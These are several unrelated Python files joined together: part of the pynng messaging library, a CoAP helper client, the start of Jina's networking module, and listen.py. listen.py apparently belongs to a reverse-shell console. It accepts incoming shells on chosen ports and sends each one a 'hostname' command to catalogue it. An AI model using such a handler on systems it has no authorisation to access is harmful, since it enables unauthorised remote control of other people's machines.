be either a :class:`str`, :class:`bytes`, or an iterable of str and bytes.
A subscriber must :meth:`~Sub0.subscribe` to specific topics, and only
messages that match the topic will be received. A subscriber can subscribe
to as many topics as you want it to.
A match is determined if the message starts with one of the subscribed
topics. So if the subscribing socket is subscribed to the topic
``b'hel'``, then the messages ``b'hel'``, ``b'help him`` and ``b'hello'``
would match, but the message ``b'hexagon'`` would not. Subscribing to an
empty string (``b''``) means that all messages will match. If a sub socket
is not subscribed to any topics, no messages will be receieved.
.. Note ::
pub/sub is a "best effort" transport; if you have a very high volume of
messages be prepared for some messages to be silently dropped.
Attempting to :meth:`~Socket.send` with a Sub0 socket will raise a
:class:`pynng.NotSupported` exception.
The following example demonstrates a basic usage of pub/sub:
.. literalinclude:: snippets/pubsub_sync.py
"""
_opener = lib.nng_sub0_open
def __init__(self, *, topics=None, **kwargs):
super().__init__(**kwargs)
if topics is None:
return
# special-case str/bytes
if isinstance(topics, (str, bytes)):
topics = [topics]
for topic in topics:
self.subscribe(topic)
def subscribe(self, topic):
"""Subscribe to the specified topic.
Topics are matched by looking at the first bytes of any received
message.
.. Note::
If you pass a :class:`str` as the ``topic``, it will be
automatically encoded with :meth:`str.encode`. If this is not the
desired behavior, just pass :class:`bytes` in as the topic.
"""
options._setopt_string(self, b'sub:subscribe', topic)
def unsubscribe(self, topic):
"""Unsubscribe to the specified topic.
.. Note::
If you pass a :class:`str` as the ``topic``, it will be
automatically encoded with :meth:`str.encode`. If this is not the
desired behavior, just pass :class:`bytes` in as the topic.
"""
options._setopt_string(self, b'sub:unsubscribe', topic)
class Req0(Socket):
"""A req0 socket.
The Python version of `nng_req
<https://nanomsg.github.io/nng/man/tip/nng_req.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It also has one extra
keyword-argument: ``resend_time``. ``resend_time`` corresponds to
``NNG_OPT_REQ_RESENDTIME``
A :class:`Req0` socket is paired with a :class:`Rep0` socket and together
they implement normal request/response behavior. the req socket
:meth:`send()s <Socket.send>` a request, the rep socket :meth:`recv()s
<Socket.recv>` it, the rep socket :meth:`send()s <Socket.Send>` a response,
and the req socket :meth:`recv()s <Socket.recv>` it.
If a req socket attempts to do a :meth:`~Socket.recv` without first doing a
:meth:`~Socket.send`, a :class:`pynng.BadState` exception is raised.
A :class:`Req0` socket supports opening multiple :class:`Contexts
<Context>` by calling :meth:`~Socket.new_context`. In this way a req
socket can have multiple outstanding requests to a single rep socket.
Without opening a :class:`Context`, the socket can only have a single
outstanding request at a time.
Here is an example demonstrating the request/response pattern.
.. literalinclude:: snippets/reqrep_sync.py
"""
resend_time = MsOption('req:resend-time')
_opener = lib.nng_req0_open
def __init__(self, *, resend_time=None, **kwargs):
super().__init__(**kwargs)
if resend_time is not None:
self.resend_time = resend_time
class Rep0(Socket):
"""A rep0 socket.
The Python version of `nng_rep
<https://nanomsg.github.io/nng/man/tip/nng_rep.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`.
A :class:`Rep0` socket along with a :class:`Req0` socket implement the
request/response pattern:
the req socket :meth:`send()s <Socket.send>` a
request, the rep socket :meth:`recv()s <Socket.recv>` it, the rep socket
:meth:`send()s <Socket.Send>` a response, and the req socket :meth:`recv()s
<Socket.recv>` it.
A :class:`Rep0` socket supports opening multiple :class:`Contexts
<Context>` by calling :meth:`~Socket.new_context`. In this way a rep
socket can service multiple requests at the same time. Without opening a
:class:`Context`, the rep socket can only service a single request at a
time.
See the documentation for :class:`Req0` for an example.
"""
_opener = lib.nng_rep0_open
class Surveyor0(Socket):
"""A surveyor0 socket.
The Python version of `nng_surveyor
<https://nanomsg.github.io/nng/man/tip/nng_surveyor.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It has one additional
attribute: ``survey_time``. ``survey_time`` sets the amount of time a
survey lasts.
:class:`Surveyor0` sockets work with :class:`Respondent0` sockets in the
survey pattern. In this pattern, a :class:`surveyor <Surveyor0>` sends a
message, and gives all :class:`respondents <Respondent0>` a chance to
chime in. The amount of time a survey is valid is set by the attribute
``survey_time``. ``survey_time`` is the time of a survey in milliseconds.
Here is an example:
.. literalinclude:: snippets/surveyor_sync.py
"""
_opener = lib.nng_surveyor0_open
survey_time = MsOption('surveyor:survey-time')
def __init__(self, *, survey_time=None, **kwargs):
super().__init__(**kwargs)
if survey_time is not None:
self.survey_time = survey_time
class Respondent0(Socket):
"""A respondent0 socket.
The Python version of `nng_respondent
<https://nanomsg.github.io/nng/man/tip/nng_respondent.7>`_.
It accepts the same keyword arguments as :class:`Socket` and also
has the same :ref:`attributes <socket-attributes>`. It accepts no
additional arguments and has no other attributes
:class:`Surveyor0` sockets work with :class:`Respondent0` sockets in the
survey pattern. In this pattern, a :class:`surveyor <Surveyor0>` sends a
message, and gives all :class:`respondents <Respondent0>` a chance to
chime in. The amount of time a survey is valid is set by the attribute
``survey_time``. ``survey_time`` is the time of a survey in milliseconds.
See :class:`Surveyor0` docs for an example.
"""
_opener = lib.nng_respondent0_open
class Dialer:
"""The Python version of `nng_dialer
<https://nanomsg.github.io/nng/man/tip/nng_dialer.5>`_. A
:class:`Dialer` is returned whenever :meth:`Socket.dial` is called. A list
of active dialers can be accessed via ``Socket.dialers``.
A :class:`Dialer` is associated with a single :class:`Socket`. The
associated socket can be accessed via the ``socket`` attribute. There is
no public constructor for creating a :class:`Dialer`
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_max_size = SizeOption('recv-size-max')
url = StringOption('url')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
tls_ca_file = StringOption('tls-ca-file')
tls_cert_key_file = StringOption('tls-cert-key-file')
tls_auth_mode = IntOption('tls-authmode')
tls_server_name = StringOption('tls-server-name')
def __init__(self, dialer, socket):
"""
Args:
dialer: the initialized `lib.nng_dialer`.
socket: The Socket associated with the dialer
"""
# I can't think of a reason you would need to directly instantiate this
# class
self._dialer = dialer
self.socket = socket
@property
def dialer(self):
return self._dialer[0]
def close(self):
"""
Close the dialer.
"""
lib.nng_dialer_close(self.dialer)
del self.socket._dialers[self.id]
@property
def id(self):
return lib.nng_dialer_id(self.dialer)
class Listener:
"""The Python version of `nng_listener
<https://nanomsg.github.io/nng/man/tip/nng_listener.5>`_. A
:class:`Listener` is returned whenever :meth:`Socket.listen` is called. A
list of active listeners can be accessed via ``Socket.listeners``.
A :class:`Listener` is associated with a single :class:`Socket`. The
associated socket can be accessed via the ``socket`` attribute. There is
no public constructor for creating a :class:`Listener`.
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_max_size = SizeOption('recv-size-max')
url = StringOption('url')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
tls_ca_file = StringOption('tls-ca-file')
tls_cert_key_file = StringOption('tls-cert-key-file')
tls_auth_mode = IntOption('tls-authmode')
tls_server_name = StringOption('tls-server-name')
def __init__(self, listener, socket):
"""
Args:
listener: the initialized `lib.nng_dialer`.
socket: The Socket associated with the dialer
"""
# I can't think of a reason you would need to directly instantiate this
# class
self._listener = listener
self.socket = socket
@property
def listener(self):
return self._listener[0]
def close(self):
"""
Close the listener.
"""
lib.nng_listener_close(self.listener)
del self.socket._listeners[self.id]
@property
def id(self):
return lib.nng_listener_id(self.listener)
class Context:
"""
This is the Python version of `nng_context
<https://nanomsg.github.io/nng/man/tip/nng_ctx.5.html>`_. The way to
create a :class:`Context` is by calling :meth:`Socket.new_context()`.
Contexts are valid for :class:`Req0` and :class:`Rep0` sockets; other
protocols do not support contexts.
Once you have a context, you just call :meth:`~Context.send` and
:meth:`~Context.recv` or the async equivalents as you would on a socket.
A "context" keeps track of a protocol's state for stateful protocols (like
REQ/REP). A context allows the same :class:`Socket` to be used for
multiple operations at the same time. For an example of the problem that
contexts are solving, see this snippet, **which does not use contexts**,
and does terrible things:
.. code-block:: python
# start a socket to service requests.
# HEY THIS IS EXAMPLE BAD CODE, SO DON'T TRY TO USE IT
# in fact it's so bad it causes a panic in nng right now (2019/02/09):
# see https://github.com/nanomsg/nng/issues/871
import pynng
import threading
def service_reqs(s):
while True:
data = s.recv()
s.send(b"I've got your response right here, pal!")
threads = []
with pynng.Rep0(listen='tcp://127.0.0.1:12345') as s:
for _ in range(10):
t = threading.Thread(target=service_reqs, args=[s], daemon=True)
t.start()
threads.append(t)
for thread in threads:
thread.join()
Contexts allow multiplexing a socket in a way that is safe. It removes one
of the biggest use cases for needing to use raw sockets.
Contexts cannot be instantiated directly; instead, create a
:class:`Socket`, and call the :meth:`~Socket.new_context` method.
"""
def __init__(self, socket):
# need to set attributes first, so that if anything goes wrong,
# __del__() doesn't throw an AttributeError
self._context = None
assert isinstance(socket, Socket)
self._socket = socket
self._context = ffi.new('nng_ctx *')
check_err(lib.nng_ctx_open(self._context, socket.socket))
assert lib.nng_ctx_id(self.context) != -1
async def arecv(self):
"""Asynchronously receive data using this context."""
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
return await aio.arecv()
async def asend(self, data):
"""Asynchronously send data using this context."""
_ensure_can_send(data)
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
return await aio.asend(data)
def recv_msg(self):
"""Synchronously receive a :class:`Message` using this context."""
aio_p = ffi.new('nng_aio **')
check_err(lib.nng_aio_alloc(aio_p, ffi.NULL, ffi.NULL))
aio = aio_p[0]
try:
check_err(lib.nng_ctx_recv(self.context, aio))
check_err(lib.nng_aio_wait(aio))
check_err(lib.nng_aio_result(aio))
nng_msg = lib.nng_aio_get_msg(aio)
msg = Message(nng_msg)
self._socket._try_associate_msg_with_pipe(msg)
finally:
lib.nng_aio_free(aio)
return msg
def recv(self):
"""Synchronously receive data on this context."""
msg = self.recv_msg()
return msg.bytes
def send_msg(self, msg):
"""Synchronously send the :class:`Message` ``msg`` on the context."""
with msg._mem_freed_lock:
msg._ensure_can_send()
aio_p = ffi.new('nng_aio **')
check_err(lib.nng_aio_alloc(aio_p, ffi.NULL, ffi.NULL))
aio = aio_p[0]
try:
check_err(lib.nng_aio_set_msg(aio, msg._nng_msg))
check_err(lib.nng_ctx_send(self.context, aio))
msg._mem_freed = True
check_err(lib.nng_aio_wait(aio))
check_err(lib.nng_aio_result(aio))
finally:
lib.nng_aio_free(aio)
def send(self, data):
"""
Synchronously send data on the context.
"""
_ensure_can_send(data)
msg = Message(data)
return self.send_msg(msg)
def close(self):
"""Close this context."""
ctx_err = 0
if self._context is not None:
# check that nng still has a reference
if lib.nng_ctx_id(self.context) != -1:
ctx_err = lib.nng_ctx_close(self.context)
self._context = None
check_err(ctx_err)
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
@property
def context(self):
"""Return the underlying nng object."""
return self._context[0]
def __del__(self):
self.close()
async def asend_msg(self, msg):
"""
Asynchronously send the :class:`Message` ``msg`` on the context.
"""
with msg._mem_freed_lock:
msg._ensure_can_send()
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
# Note: the aio helper sets the _mem_freed flag on the msg
return await aio.asend_msg(msg)
async def arecv_msg(self):
"""
Asynchronously receive a :class:`Message` on the context.
"""
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
msg = await aio.arecv_msg()
self._socket._try_associate_msg_with_pipe(msg)
return msg
def _do_callbacks(pipe, callbacks):
for cb in callbacks:
try:
cb(pipe)
except Exception:
msg = 'Exception raised in pre pipe connect callback {!r}'
logger.exception(msg.format(cb))
@ffi.def_extern()
def _nng_pipe_cb(lib_pipe, event, arg):
logger.debug("Pipe callback event {}".format(event))
# Get the Socket from the handle passed through the callback arguments
sock = ffi.from_handle(arg)
# exceptions don't propagate out of this function, so if any exception is
# raised in any of the callbacks, we just log it (using logger.exception).
with sock._pipe_notify_lock:
pipe_id = lib.nng_pipe_id(lib_pipe)
if event == lib.NNG_PIPE_EV_ADD_PRE:
# time to do our bookkeeping; actually create the pipe and attach it to
# the socket
pipe = sock._add_pipe(lib_pipe)
_do_callbacks(pipe, sock._on_pre_pipe_add)
if pipe.closed:
# NB: we need to remove the pipe from socket now, before a remote
# tries connecting again and the same pipe ID may be reused. This
# will result in a KeyError below.
sock._remove_pipe(lib_pipe)
elif event == lib.NNG_PIPE_EV_ADD_POST:
# The ADD_POST event can arrive before ADD_PRE, in which case the Socket
# won't have the pipe_id in the _pipes dictionary
# _add_pipe will return an existing pipe or create a new one if it doesn't exist
pipe = sock._add_pipe(lib_pipe)
_do_callbacks(pipe, sock._on_post_pipe_add)
elif event == lib.NNG_PIPE_EV_REM_POST:
try:
pipe = sock._pipes[pipe_id]
except KeyError:
# we get here if the pipe was closed in pre_connect earlier. This
# is not a big deal.
logger.debug('Could not find pipe for socket')
return
try:
_do_callbacks(pipe, sock._on_post_pipe_remove)
finally:
sock._remove_pipe(lib_pipe)
class Pipe:
"""
A "pipe" is a single connection between two endpoints. This is the Python
version of `nng_pipe
<https://nanomsg.github.io/nng/man/v1.1.0/nng_pipe.5>`_.
There is no public constructor for a Pipe; they are automatically added to
the underlying socket whenever the pipe is created.
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
url = StringOption('url')
protocol = IntOption('protocol')
protocol_name = StringOption('protocol-name')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
def __init__(self, lib_pipe, socket):
# Ohhhhkay
# so
# this is weird, I know
# okay
# so
# For some reason, I'm not sure why, if we keep a reference to lib_pipe
# directly, we end up with memory corruption issues. Maybe it's a
# weird interaction between getting called in a callback and refcount
# or something, I dunno. Anyway, we need to make a copy of the
# lib_pipe object.
self._pipe = ffi.new('nng_pipe *')
self._pipe[0] = lib_pipe
self.pipe = self._pipe[0]
self.socket = socket
self._closed = False
@property
def closed(self):
"""
Return whether the pipe has been closed directly.
This will not be valid if the pipe was closed indirectly, e.g. by
closing the associated listener/dialer/socket.
"""
return self._closed
@property
def id(self):
return lib.nng_pipe_id(self.pipe)
@property
def dialer(self):
"""
Return the dialer this pipe is associated with. If the pipe is not
associated with a dialer, raise an exception
"""
dialer = lib.nng_pipe_dialer(self.pipe)
d_id = lib.nng_dialer_id(dialer)
if d_id < 0:
raise TypeError('This pipe has no associated dialers.')
return self.socket._dialers[d_id]
@property
def listener(self):
"""
Return the listener this pipe is associated with. If the pipe is not
associated with a listener, raise an exception
"""
listener = lib.nng_pipe_listener(self.pipe)
l_id = lib.nng_listener_id(listener)
if l_id < 0:
raise TypeError('This pipe has no associated listeners.')
return self.socket._listeners[l_id]
def close(self):
"""
Close the pipe.
"""
check_err(lib.nng_pipe_close(self.pipe))
self._closed = True
def send(self, data):
"""
Synchronously send bytes from this :class:`Pipe`. This method
automatically creates a :class:`Message`, associates with this pipe,
and sends it with this pipe's associated :class:`Socket`.
"""
_ensure_can_send(data)
msg = Message(data, self)
self.socket.send_msg(msg)
def send_msg(self, msg):
"""
Synchronously send a Message from this :class:`Pipe`.
"""
msg.pipe = self
self.socket.send_msg(msg)
async def asend(self, data):
"""
Asynchronously send bytes from this :class:`Pipe`.
"""
_ensure_can_send(data)
msg = Message(data, self)
return await self.socket.asend_msg(msg)
async def asend_msg(self, msg):
"""
Asynchronously send a Message from this :class:`Pipe`.
"""
msg.pipe = self
return await self.socket.asend_msg(msg)
class Message:
"""
Python interface for `nng_msg
<https://nanomsg.github.io/nng/man/tip/nng_msg.5.html>`_. Using the
:class:`Message` interface gives more control over aspects of
sending the message. In particular, you can tell which
:class:`Pipe` a message came from on receive, and you can direct
which :class:`Pipe` a message will be sent from on send.
In normal usage, you would not create a :class:`Message` directly. Instead
you would receive a message using :meth:`Socket.recv_msg`, and send a
message (implicitly) by using :meth:`Pipe.send`.
Since the main purpose of creating a :class:`Message` is to send it using a
specific :class:`Pipe`, it is usually more convenient to just use the
:meth:`Pipe.send` or :meth:`Pipe.asend` method directly.
Messages in pynng are immutable; this is to prevent data corruption.
Warning:
Access to the message's underlying data buffer can be accessed with the
``_buffer`` attribute. However, care must be taken not to send a message
while a reference to the buffer is still alive; if the buffer is used after
a message is sent, a segfault or data corruption may (read: will)
result.
"""
def __init__(self, data, pipe=None):
# NB! There are two ways that a user can free resources that an nng_msg
# is using: either sending with nng_sendmsg (or the async equivalent)
# or with nng_msg_free. We don't know how this msg will be used, but
# we need to **ensure** that we don't try to double free. The flag
# _mem_freed is used to indicate that we cannot send the message again.
# The methods send_msg() and asend_msg() must ensure that the flag
# `_mem_freed` is set to True.
self._mem_freed = False
self._mem_freed_lock = threading.Lock()
if isinstance(data, ffi.CData) and \
ffi.typeof(data).cname == 'struct nng_msg *':
self._nng_msg = data
else:
msg_p = ffi.new('nng_msg **')
check_err(lib.nng_msg_alloc(msg_p, 0))
msg = msg_p[0]
check_err(lib.nng_msg_append(msg, data, len(data)))
self._nng_msg = msg
# We may not have been given a pipe, in which case the pipe is None.
if pipe is None:
self._pipe = None
else:
self.pipe = pipe
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if not isinstance(pipe, Pipe):
msg = 'pipe must be type Pipe, not {}'.format(type(pipe))
raise ValueError(msg)
check_err(lib.nng_msg_set_pipe(self._nng_msg, pipe.pipe))
self._pipe = pipe
@property
def _buffer(self):
"""
Returns a cffi.buffer to the underlying nng_msg buffer.
If you access the message's buffer using this property, you must ensure
that you do not send the message until you are not using the buffer
anymore.
"""
with self._mem_freed_lock:
if not self._mem_freed:
size = lib.nng_msg_len(self._nng_msg)
data = ffi.cast('char *', lib.nng_msg_body(self._nng_msg))
return ffi.buffer(data[0:size])
@property
def bytes(self):
"""
Return the bytes from the underlying buffer.
"""
return bytes(self._buffer)
def __del__(self):
with self._mem_freed_lock:
if self._mem_freed:
return
else:
lib.nng_msg_free(self._nng_msg)
# pretty sure it's not necessary to set this, but that's okay.
self._mem_freed = True
def _ensure_can_send(self):
"""
Raises an exception if the message's state is such that it cannot be
sent. The _mem_freed_lock() must be acquired when this method is
called.
"""
assert self._mem_freed_lock.locked()
if self._mem_freed:
msg = 'Attempted to send the same message more than once.'
raise pynng.MessageStateError(msg)
|
listen.py | import socket
import time
import sys
from colorama import Fore, init
import connection
import threading
import argparse
#make sure colors work properly in Windows
if sys.platform == 'win32' or sys.platform == 'win64':
init(convert=True)
host = ''
port = ''
sockets = []
ports = []
args = ''
description = 'start listener on specified port'
#this is what's used to actually call the module in server.py
cmdstring = 'listener'
#run module
def execute(cmd):
cmd = cmd.split(cmdstring)[1].lstrip().split()
if parse(cmd):
try:
command()
except Exception as e:
print_error(e)
#what happens when module is run
def command():
global sockets
global ports
#attempt to start a listener if port is available
if args.action == 'start':
if port in ports:
print_error('There is already a listener on that port!')
else:
bind()
#kill a listener
elif args.action == 'stop':
try:
if port in ports:
i = ports.index(port)
#cleanup time!
sockets[i].close()
del sockets[i]
del ports[i]
time.sleep(1)
print_notification('Successfully terminated listener on port ' + str(port))
else:
print_error('There is no listener on that port!')
except Exception as e:
print_error(e)
#show all listeners in pretty format
elif args.action == 'show':
print(Fore.LIGHTCYAN_EX + '\n--------- Ports ---------\n' + Fore.RESET, end='')
for p in ports:
print(Fore.LIGHTYELLOW_EX + '--> ' + str(p) + Fore.RESET)
print(Fore.LIGHTCYAN_EX + '-------------------------\n' + Fore.RESET)
#bind port and socket
def bind():
global sockets
global ports
try:
s = socket.socket()
except socket.error as msg:
print(Fore.LIGHTRED_EX + "[!] Socket creation error: " + msg + Fore.RESET)
try:
s.bind((host,port))
sockets.append(s)
ports.append(port)
s.settimeout(1)
#use threads!
t = threading.Thread(target=listen, args=(s,))
t.daemon = True
t.start()
print_notification('Listening for incoming connections on port ' + str(port))
except:
print_error('Error binding socket! Is socket already listening?')
return
#what happens once we start the listeners
def listen(s):
global sockets
global ports
s.listen(5)
while True:
try:
#can't get in
if(s._closed):
break
#connect to host
try:
conn, address = s.accept()
except:
continue
conn.setblocking(0)
connection.connections.append(conn)
connection.addresses.append(address)
ip = conn.getsockname()[0]
#notify upon successful connection
print(Fore.LIGHTYELLOW_EX + "\n[+] Connection recieved from " + address[0] + ' on port ' + str(s.getsockname()[1]) + Fore.LIGHTCYAN_EX + '\n' + Fore.RESET, end='')
#run some commands to get ourselves a nice little prompt and record hostname
try:
connection.recieve_immediately(conn)
conn.send(str.encode('hostname\n'))
hostname = connection.recieve_immediately(conn).split('\n')[0]
hostname = hostname.strip('\r')
#couldn't get the hostname :/
except:
print_error('Error getting hostname for ' + address[0] + '!')
hostname = 'unknown'
connection.hostnames.append(hostname)
except Exception as e:
print_error(e)
pass
#just some color coding
def print_error(error):
print(Fore.LIGHTRED_EX + '[!] ' + error + Fore.RESET)
def print_notification(notification):
print(Fore.LIGHTYELLOW_EX + '[+] ' + notification + Fore.RESET)
#handle argument parsing for the module
def parse(cmd):
global port
global args
global description
try:
parser = argparse.ArgumentParser(description=description)
subparsers = parser.add_subparsers(help='add or remove listeners')
add = subparsers.add_parser('add', help='add a listener')
add.add_argument(dest='port', type=int, help='specify port')
add.set_defaults(action='start')
remove = subparsers.add_parser('remove', help='remove a listener')
remove.add_argument(dest='port', type=int, help='specify port')
remove.set_defaults(action='stop')
show = subparsers.add_parser('show', help='show active listeners')
show.set_defaults(action='show')
if len(cmd) == 0:
parser.print_help()
print()
return False
args = parser.parse_args(cmd)
if hasattr(args,'port'):
port = args.port
return True
except:
print()
return False
|
helperclient.py | import random
from multiprocessing import Queue
from queue import Empty
import threading
from coapthon.messages.message import Message
from coapthon import defines
from coapthon.client.coap import CoAP
from coapthon.messages.request import Request
from coapthon.utils import generate_random_token
import socket
__author__ = 'Giacomo Tanganelli'
class HelperClient(object):
"""
Helper Client class to perform requests to remote servers in a simplified way.
"""
def __init__(self, server, sock=None, cb_ignore_read_exception=None, cb_ignore_write_exception=None):
"""
Initialize a client to perform request to a server.
:param server: the remote CoAP server
:param sock: if a socket has been created externally, it can be used directly
:param cb_ignore_read_exception: Callback function to handle exception raised during the socket read operation
:param cb_ignore_write_exception: Callback function to handle exception raised during the socket write operation
"""
#self.server = server
# bug fix:check if host is a domain, if true, convert server domain into ip
server_ip = socket.getaddrinfo(server[0], None)[0][4][0]
if server_ip == server[0]:
self.server = server
else:
self.server = (server_ip, server[1])
self.protocol = CoAP(self.server, random.randint(1, 65535), self._wait_response, sock=sock,
cb_ignore_read_exception=cb_ignore_read_exception, cb_ignore_write_exception=cb_ignore_write_exception)
self.queue = Queue()
def _wait_response(self, message):
"""
Private function to get responses from the server.
:param message: the received message
"""
if message is None or message.code != defines.Codes.CONTINUE.number:
self.queue.put(message)
def stop(self):
"""
Stop the client.
"""
self.protocol.close()
self.queue.put(None)
def close(self):
"""
Close the client.
"""
self.stop()
def _thread_body(self, request, callback):
"""
Private function. Send a request, wait for response and call the callback function.
:param request: the request to send
:param callback: the callback function
"""
self.protocol.send_message(request)
while not self.protocol.stopped.isSet():
response = self.queue.get(block=True)
callback(response)
def cancel_observing(self, response, send_rst): # pragma: no cover
"""
Delete observing on the remote server.
:param response: the last received response
:param send_rst: if explicitly send RST message
:type send_rst: bool
"""
if send_rst:
message = Message()
message.destination = self.server
message.code = defines.Codes.EMPTY.number
message.type = defines.Types["RST"]
message.token = response.token
message.mid = response.mid
self.protocol.send_message(message)
self.stop()
def get(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.GET, path)
request.token = generate_random_token(2)
for k, v in kwargs.items():
print ("get", k,v)
if hasattr(request, k):
print ("get : setting:", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def get_non(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request_non(defines.Codes.GET, path)
#request.token = generate_random_token(2)
for k, v in kwargs.items():
print ("get_none", k,v)
if hasattr(request, k):
print ("get_none", k,v)
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def observe(self, path, callback, timeout=None, **kwargs): # pragma: no cover
"""
Perform a GET with observe on a certain path.
:param path: the path
:param callback: the callback function to invoke upon notifications
:param timeout: the timeout of the request
:return: the response to the observe request
"""
request = self.mk_request(defines.Codes.GET, path)
request.observe = 0
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def delete(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a DELETE on a certain path.
:param path: the path
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.DELETE, path)
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout)
def post(self, path, payload, callback=None, timeout=None, no_response=False, **kwargs): # pragma: no cover
"""
Perform a POST on a certain path.
:param path: the path
:param payload: the request payload
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.POST, path)
request.token = generate_random_token(2)
request.payload = payload
if no_response:
request.add_no_response()
request.type = defines.Types["NON"]
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout, no_response=no_response)
def put(self, path, payload, callback=None, timeout=None, no_response=False, **kwargs): # pragma: no cover
"""
Perform a PUT on a certain path.
:param path: the path
:param payload: the request payload
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
request = self.mk_request(defines.Codes.PUT, path)
request.token = generate_random_token(2)
request.payload = payload
if no_response:
request.add_no_response()
request.type = defines.Types["NON"]
for k, v in kwargs.items():
if hasattr(request, k):
setattr(request, k, v)
return self.send_request(request, callback, timeout, no_response=no_response)
def discover(self, path, callback=None, timeout=None, **kwargs): # pragma: no cover
"""
Perform a Discover request on the server.
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
if path == None:
request = self.mk_request_non(defines.Codes.GET, "/oic/res")
else:
request = self.mk_request_non(defines.Codes.GET, path)
request.token = generate_random_token(2)
print ("discover : path=", path)
for k, v in kwargs.items():
print ("discover : has:", k,v)
if hasattr(request, k):
try:
print ("discover : setting:", k,v)
setattr(request, k, v)
except:
pass
return self.send_request(request, callback, timeout)
def send_request(self, request, callback=None, timeout=None, no_response=False): # pragma: no cover
"""
Send a request to the remote server.
:param request: the request to send
:param callback: the callback function to invoke upon response
:param timeout: the timeout of the request
:return: the response
"""
if callback is not None:
thread = threading.Thread(target=self._thread_body, args=(request, callback))
thread.start()
else:
self.protocol.send_message(request)
if no_response:
return
try:
response = self.queue.get(block=True, timeout=timeout)
except Empty:
#if timeout is set
response = None
return response
def send_empty(self, empty): # pragma: no cover
"""
Send empty message.
:param empty: the empty message
"""
self.protocol.send_message(empty)
def mk_request(self, method, path):
"""
Create a request.
:param method: the CoAP method
:param path: the path of the request
:return: the request
"""
request = Request()
request.destination = self.server
request.code = method.number
request.uri_path = path
return request
def mk_request_non(self, method, path):
"""
Create a request.
:param method: the CoAP method
:param path: the path of the request
:return: the request
"""
request = Request()
request.destination = self.server
request.code = method.number
request.uri_path = path
request.type = defines.Types["NON"]
return request
# feature update : ping
def ping(self):
"""
send a CON empty message to server to trigger RST response (CoAP ping)
"""
empty = Request()
empty.destination = self.server
empty.type = 0
self.send_empty(empty)
|
networking.py | import ast
import asyncio
import ipaddress
import socket
from abc import abstractmethod
from argparse import Namespace
from threading import Thread
from typing import TYPE_CHECKING, Optional
import grpc
from jina.logging.logger import JinaLogger
from jina.proto import jina_pb2_grpc
from jina.types.message import Message
from .. import __default_host__, __docker_host__
from ..helper import get_internal_ip, get_or_reuse_loop, get_public_ip
if TYPE_CHECKING:
import kubernetes
class ConnectionList:
"""
Maintains a list of connections and uses round roubin for selecting a connection
:param port: port to use for the connections
"""
def __init__(self, port: int):
self.port = port
self._connections = []
self._address_to_connection_idx = {}
self._rr_counter = 0
def add_connection(self, address: str, connection):
"""
Add connection with ip to the connection list
:param address: Target address of this connection
:param connection: The connection to add
"""
if address not in self._address_to_connection_idx:
self._address_to_connection_idx[address] = len(self._connections)
self._connections.append(connection)
def remove_connection(self, address: str):
"""
Remove connection with ip from the connection list
:param address: Remove connection for this address
:returns: The removed connection or None if there was not any for the given ip
"""
if address in self._address_to_connection_idx:
self._rr_counter = (
self._rr_counter % (len(self._connections) - 1)
if (len(self._connections) - 1)
else 0
)
return self._connections.pop(self._address_to_connection_idx.pop(address))
return None
def get_next_connection(self):
"""
Returns a connection from the list. Strategy is round robin
:returns: A connection from the pool
"""
try:
connection = self._connections[self._rr_counter]
except IndexError:
# This can happen as a race condition while removing connections
self._rr_counter = 0
connection = self._connections[self._rr_counter]
self._rr_counter = (self._rr_counter + 1) % len(self._connections)
return connection
def pop_connection(self):
"""
Removes and returns a connection from the list. Strategy is round robin
:returns: The connection removed from the pool
"""
if self._connections:
connection = self._connections.pop(self._rr_counter)
self._rr_counter = (
(self._rr_counter + 1) % len(self._connections)
if len(self._connections)
else 0
)
return connection
else:
return None
def has_connection(self, address: str) -> bool:
"""
Checks if a connection for ip exists in the list
:param address: The address to check
:returns: True if a connection for the ip exists in the list
"""
